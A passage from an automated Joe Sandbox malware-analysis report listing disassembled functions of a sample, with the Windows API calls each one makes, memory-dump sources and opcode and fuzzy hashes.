                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC311270A80248ABFB31CB6C8844BFE7BB5AB48314F04825AE5D6961D9CB7D858587A1
                                                                                                                                                                                                                                                                                                        Function 0101B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0101B5B8
                                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0101B5D4
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0101B63B
                                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0101B68D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: bbc7f7f5fb8af8de0650e77a2b27132ead22e41ff72a4bc740b745bdeb4810b5
                                                                                                                                                                                                                                                                                                        • Instruction ID: 09c8713ccdf82bfd4f72b1e7a0796cffa79cf1b0dc6034d3362c829099f4a10e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbc7f7f5fb8af8de0650e77a2b27132ead22e41ff72a4bc740b745bdeb4810b5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE315C70A00648AFFF318B6C88047FE7BF6AFAC310F044A6AE4C1821D9C37C86418B91
                                                                                                                                                                                                                                                                                                        Function 010480AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 010480D4
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0104814A
                                                                                                                                                                                                                                                                                                        • PtInRect.USER32(?,?,?), ref: 0104815A
                                                                                                                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 010481C6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b6337e6c0885adf2d59485a158267e797e57d54b629837acf8f75bf58973071b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6c0f91922665af898a54008489f917734daf1f59a9e4de2b06a095e94fe3d106
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6337e6c0885adf2d59485a158267e797e57d54b629837acf8f75bf58973071b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB41A0B4A00205DFDB12DF98C4D4AAD7BF9BB49310F0488B7EAC49B265C735A841CB40
                                                                                                                                                                                                                                                                                                        Function 01042176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 01042187
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetWindowThreadProcessId.USER32(?,00000000), ref: 010143AD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetCurrentThreadId.KERNEL32 ref: 010143B4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,01012F00), ref: 010143BB
                                                                                                                                                                                                                                                                                                        • GetCaretPos.USER32(?), ref: 0104219B
                                                                                                                                                                                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 010421E8
                                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 010421EE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 548181130084312226f762d7fb74d9f4885b8f2dcd3e7a11ff27bb4ce9506b0d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 16d21ccc04bc92d0f86d09a6ff11cec0e19b8d60eca9e97f0a7e818925bd0837
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 548181130084312226f762d7fb74d9f4885b8f2dcd3e7a11ff27bb4ce9506b0d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 043152B5E00109AFC700DFAAC8C1CEEB7FCEF98304B5040A9E455E7211D6759E45CBA0
                                                                                                                                                                                                                                                                                                        Function 0101E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB41EA: _wcslen.LIBCMT ref: 00FB41EF
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101E8E2
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101E8F9
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101E924
                                                                                                                                                                                                                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0101E92F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3e07c15526661c07c93c6a64a43c684bf02ad068e88a8af5ffcd8d2024aab318
                                                                                                                                                                                                                                                                                                        • Instruction ID: 414f45a339c5a55db0fd64c2996f8c0a6de2c0565ebc50f11244f2ed009b969a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e07c15526661c07c93c6a64a43c684bf02ad068e88a8af5ffcd8d2024aab318
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D821F671D00214AFCB52AFA8CD81BAEB7F9EF45310F1440A5F944AB345D7789E418BA1
                                                                                                                                                                                                                                                                                                        Function 0101DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,0104DC30), ref: 0101DBA6
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0101DBB5
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0101DBC4
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0104DC30), ref: 0101DC21
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 408b6db47c11544a54589dd2bba2ea3f24bc93c5d1b30eea76632d4403a4bb4e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 35211fe3765cf08c5f0a9cd44af03791228bd6bffcce03e8827eaacee328002f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 408b6db47c11544a54589dd2bba2ea3f24bc93c5d1b30eea76632d4403a4bb4e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA21B17020420A9F8310DFA8C98489ABBE8FF69364F104A5DF4D987291DB39D946CF42
                                                                                                                                                                                                                                                                                                        Function 01049A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 01049A5D
                                                                                                                                                                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 01049A72
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 01049ABA
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 01049AF0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 18d966fd9df41db321061192834d44b974afb9661222596fea317219a4d846c6
                                                                                                                                                                                                                                                                                                        • Instruction ID: b864d5bca9f294a951062cd62c2b4b8045ff34952a18dd1e6e23bc4467173afd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18d966fd9df41db321061192834d44b974afb9661222596fea317219a4d846c6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65219C74600018AFDF258F98C888EEF7FBAEB09354F4041B5FA858B161D7359960DB90
                                                                                                                                                                                                                                                                                                        Function 0104321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 010432A6
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010432C0
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010432CE
                                                                                                                                                                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 010432DC
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1b010308ae01caa29dd15e363a6b31251e7c990d0e2543f36367b48ca0cd6f2f
                                                                                                                                                                                                                                                                                                        • Instruction ID: a797358a44d08b39b3794d7da07d42e7b5544e976d7fbced95b279a1b43034b7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b010308ae01caa29dd15e363a6b31251e7c990d0e2543f36367b48ca0cd6f2f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A21D671304121AFE7549B24C985FAA7B95FF95324F148268F8A68F2C2C776EC41CBD0
                                                                                                                                                                                                                                                                                                        Function 0102D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 0102D8CE
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0102D92F
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 0102D943
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 94cdd4d22fde5946bf4a0422f29d544fbaaa31191d47ef450f276d119078d483
                                                                                                                                                                                                                                                                                                        • Instruction ID: f68a8c24fa9b62259f24b6458aaad537abbb8e769cff83be51c41b6cb1bd9e9e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94cdd4d22fde5946bf4a0422f29d544fbaaa31191d47ef450f276d119078d483
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2221B0B5600715AFE7709FA9C988BAA7BF9AB40314F10445EF68692142E774EE05CB50
                                                                                                                                                                                                                                                                                                        Function 0101825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010196E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,01018271,?,000000FF,?,010190BB,00000000,?,0000001C,?,?), ref: 010196F3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010196E4: lstrcpyW.KERNEL32(00000000,?,?,01018271,?,000000FF,?,010190BB,00000000,?,0000001C,?,?,00000000), ref: 01019719
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010196E4: lstrcmpiW.KERNEL32(00000000,?,01018271,?,000000FF,?,010190BB,00000000,?,0000001C,?,?), ref: 0101974A
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,010190BB,00000000,?,0000001C,?,?,00000000), ref: 0101828A
                                                                                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,010190BB,00000000,?,0000001C,?,?,00000000), ref: 010182B0
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,010190BB,00000000,?,0000001C,?,?,00000000), ref: 010182EB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                                        • String ID: cdecl
                                                                                                                                                                                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9b5cd793a97dbf6508cad72482f5ad3bc2c588dc471b5ae9e016908d9edabaea
                                                                                                                                                                                                                                                                                                        • Instruction ID: c4ff5b537cac63fd41f54e0204f789061a4eb643efb2376b7e5641929960b967
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b5cd793a97dbf6508cad72482f5ad3bc2c588dc471b5ae9e016908d9edabaea
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53112C7A200341ABCB159F78C844E7A77E5FF49750B00802BF982C7258EF359501D750
                                                                                                                                                                                                                                                                                                        Function 010460FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 0104615A
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0104616C
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01046177
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 010462B5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c351df16482641684796d6714ce75f9e2531509a943c3f50b96a848639b5eab7
                                                                                                                                                                                                                                                                                                        • Instruction ID: bec96feef5eed4788a5b13d89754e847cb43b2901b4116c0c0efe19c5e8634c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c351df16482641684796d6714ce75f9e2531509a943c3f50b96a848639b5eab7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C11B1B5610208A7EB20DFA8CCC4AEE7BACEB12750B14407BFA91D6182FB75D540CB61
                                                                                                                                                                                                                                                                                                        Function 00FE2079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9186886b99265aac37d59be265f2d85464927baa1290610f49234c1baebbcc7a
                                                                                                                                                                                                                                                                                                        • Instruction ID: abe5d9a0b352bf5bc80741815887fcfd3a6c2da1c464aab0a1b30d44762dea7a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9186886b99265aac37d59be265f2d85464927baa1290610f49234c1baebbcc7a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4012BF260928A7FFAB0257A6CC0F27730DDF81378B340325B621911D5FE358C40A260
                                                                                                                                                                                                                                                                                                        Function 01012374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 01012394
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 010123A6
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 010123BC
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 010123D7
